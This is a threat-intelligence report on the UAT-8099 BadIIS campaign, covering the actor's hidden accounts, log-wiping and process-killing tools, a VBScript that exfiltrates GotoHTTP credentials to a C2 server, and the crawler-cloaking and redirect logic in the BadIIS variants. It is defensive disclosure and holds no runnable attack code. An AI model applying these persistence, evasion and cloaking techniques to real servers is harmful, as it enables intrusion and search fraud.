UAT-8099 Resurfaces With Region-Targeted BadIIS Campaign Across Southeast Asia

CyberDefender 14 mins0

We observed renewed activity associated with UAT-8099 beginning in August 2025 and continuing through early 2026. Analysis of file telemetry and DNS traffic indicates that compromised IIS servers are distributed across India, Pakistan, Thailand, Vietnam, and Japan, with a particularly heavy concentration of activity in Thailand and Vietnam. This activity also shows significant overlap with the WEBJACK campaign. We identified high-confidence correlations across malware hashes, command-and-control (C2) infrastructure, victimology, and the gambling sites being promoted, suggesting a shared or closely related operational ecosystem.

While the threat actor continues to rely on web shells, SoftEther VPN, and EasyTier to manage compromised IIS servers, their operational approach has evolved notably. First, the latest campaign reflects a shift in black-hat SEO tactics from broad, global targeting to a more narrowly defined regional focus. Second, the actor increasingly abuses red-team utilities and legitimate tools to evade detection and establish long-term persistence.

Infection chain

After obtaining initial access, the threat actor executes standard reconnaissance commands such as whoami and tasklist to collect basic system information. They then deploy VPN tooling and establish persistence by creating a hidden local user account named “admin$”.

UAT-8099 has expanded its tooling set with several new components:

  • Sharp4RemoveLog
    A .NET utility designed to clear all Windows event logs, effectively removing forensic evidence.
  • CnCrypt Protect
    A Chinese-language file protection utility. In this campaign, it is abused to conceal malicious files and enable DLL redirection. This tool has been associated with IIS-based attacks since 2024, including SEO fraud campaigns targeting Vietnam and China, as well as the WEBJACK campaign.
  • OpenArk64
    An open-source anti-rootkit tool. The actor abuses its kernel-level access to terminate security product processes that are otherwise protected from termination.
  • GotoHTTP
    An online remote-control tool. The actor deploys this tool using VBScript to remotely control compromised servers. Additional details are provided later in this report.

Following these steps, the actor deploys two archive files containing the latest version of the BadIIS malware. Notably, the archive filenames correspond directly to the geographic regions targeted by the malware—for example, “VN” for Vietnam and “TH” for Thailand.

C:/Users/admin$/Desktop/TH.zip
C:/Users/admin$/Desktop/VN.zip

Following the publication of earlier research, security products broadly began flagging the “admin$” account name. In response, when this account is blocked, the threat actor creates a new hidden account named “mysql$” to retain access and continue operating the BadIIS SEO fraud service.

Using this new account, the actor redeploys an updated BadIIS payload. This marks a clear shift from indiscriminate global targeting to region-specific deployments, reflected in directory naming conventions such as “VN” for Vietnam and “newth” for Thailand.

C:/Users/mssql$/Desktop/VN/fasthttp.dll
C:/Users/mssql$/Desktop/VN/cgihttp.dll
C:/Users/mssql$/Desktop/VN/install.bat
C:/Users/mssql$/Desktop/VN/uninstall.bat
C:/Users/mssql$/Desktop/newth/iis32.dll
C:/Users/mssql$/Desktop/newth/iis64.dll
C:/Users/mssql$/Desktop/newth/install.bat
C:/Users/mssql$/Desktop/newth/uninstall.bat

The actor also attempted to create additional hidden accounts to reinforce persistence.

Abuse of the GotoHTTP remote-control tool

Multiple instances were observed in which UAT-8099 used a web shell to execute PowerShell commands that downloaded and executed a malicious VBScript. This script deploys the GotoHTTP tool and exfiltrates the gotohttp.ini configuration file to the C2 server. This enables the actor to retrieve the connection ID and password required to remotely control the compromised server.

The VBScript contains multiple functions annotated with Simplified Chinese and Pinyin comments. A breakdown of these functions follows.

The script begins by initializing key parameters such as download and upload URLs, file paths, and the expected file size of gotohttp.exe. This section is labeled “dingyichangliang” (定义常量 – Define Constants).

The first functional block, labeled “xiazaiwenjian” (下载文件 – Download File), uses an HTTP GET request to download the GotoHTTP executable and save it to the public directory as xixixi.exe.

The second and third blocks, labeled “jianchawenjian” (检查文件 – Check File) and “jianchawenjian daxiao” (检查文件大小 – Check File Size), validate the presence and size of the downloaded file. If validation fails, the script reports errors to the C2 server:

  • “xiazaishibai” (下载失败 – Download failed)
  • “daxiaobudui” (大小不对 – Incorrect size)

The fourth and fifth blocks, labeled “zhixingwenjian” (执行文件 – Execute File) and “jianchajieguo” (检查结果 – Check Result), execute the tool in a hidden window without waiting for completion. The script uses Chr(34) to represent quotation marks, avoiding syntax errors caused by improper escaping.

After a five-second delay, the script attempts to upload gotohttp.ini to the C2 server. If the file does not exist, it sends the error “gotohttp.ini bucunzai” (gotohttp.ini 不存在 – File does not exist).

The final block, labeled “qingli” (清理 – Clean), releases and cleans up all COM objects.

Two new BadIIS malware clusters targeting specific regions

Since September 2025, two new BadIIS variants have been observed in active SEO fraud campaigns. This analysis is based on reverse engineering and infection-chain telemetry. We assess that UAT-8099 customizes these BadIIS clusters for region-specific targeting.

  • BadIIS IISHijack, named after the original malware filename
  • BadIIS asdSearchEngine, named after PDB strings found in the sample
E:\原生DLL\SearchEngine\Release\SearchEngine.pdb
C:\Users\qwe\source\repos\Dll1dasd\x64\Release\Dll1dasd.pdb

BadIIS IISHijack

This variant primarily targets Vietnam. It explicitly embeds the country code within its source code and creates a dedicated directory when deployed.

BadIIS asdSearchEngine

This variant targets Thailand and users with Thai language preferences. By hooking the CHttpModule::OnBeginRequest handler, it inspects incoming HTTP headers—including User-Agent, Referer, and Accept-Language—to determine how to respond.

If the requested path contains extensions from an exclusion list, the request is ignored to preserve static resources. If the User-Agent matches a known crawler (e.g., Googlebot, sogu, 360spider, or Baiduspider), the request is redirected to an SEO fraud site. If the visitor is a regular user and the Accept-Language header indicates Thai, the malware injects HTML containing a malicious JavaScript redirect.

Three distinct variants were identified within this cluster. While they share a common workflow, each includes unique features. Some variants use XOR encryption (key 0x7A) to obfuscate C2 configuration data and injected HTML.

Exclusive multiple-extensions variant

This variant filters requests based on file extensions before executing its payload. The filtering serves three purposes:

  1. Preserve site integrity
    Extensions such as .png, .jpg, .css, .js, .woff, .ttf, .eot, and .otf are excluded to avoid breaking site appearance and functionality.
  2. Focus SEO manipulation
    Document and web-related extensions (e.g., .pdf, .json, .robots, .sitemap) are filtered so injections target content that influences SEO rankings.
  3. Conserve resources
    Archive formats (.zip, .rar, .7z, .tar, .gz) are ignored.

Dynamic page / directory index variant

Another variant validates whether the requested path corresponds to a dynamic page extension or a directory index. Only qualifying requests are routed through the malicious processing logic.

This design prioritizes SEO effectiveness while maintaining stealth. By focusing on dynamic pages frequently crawled by search engines, the malware avoids interfering with static assets and reduces the likelihood of generating suspicious server-side errors.

HTML template loading variant

The final variant includes a sophisticated HTML template generation system. It attempts to load templates from disk and falls back to embedded templates if none are found. Placeholders are populated with randomized content, URLs, and timestamps.

If no external templates exist, the malware generates content using an embedded HTML template. Variable names are written in Chinese Pinyin, revealing how keywords are programmatically inserted to support SEO fraud.

Template variables

Head section

  • {biaoti} (标题 – title): Page title
  • {shoudongmiaoshu} (手动描述 – manual description): Meta description
  • {guanjianci} (关键词 – keywords): Meta keywords

Body section

  • <h1>Welcome to {biaoti}</h1>
  • {shoudongmiaoshu} paragraph
  • {gudinglianjie} (固定链接 – permalink)
  • {riqi} (日期 – date)
  • {suijirenming1} (随机人名 – random name)
  • {suijiduanluo1} (随机段落 – random paragraph)

The keywords promoted by UAT-8099 are hardcoded within the malware and dynamically inserted into generated pages to facilitate SEO fraud.

Linux BadIIS variant identified on VirusTotal

An ELF (Linux) variant of BadIIS was also identified on VirusTotal. Its functionality mirrors previously documented versions, including proxy, injector, and SEO fraud modes. The hardcoded C2 domain matches infrastructure previously attributed to UAT-8099, enabling high-confidence attribution.

The URL path targeting pattern remains consistent with prior campaigns:

news|cash|bet|gambling|betting|casino|fishing|deposit|bonus|sitemap|app|ios|video|games|xoso|dabong|nohu

Unlike earlier versions, this ELF variant targets only three search engines:

User-AgentReferer
Googlebotgoogle
Bingbotbing
Yahoo!yahoo

CyberDefender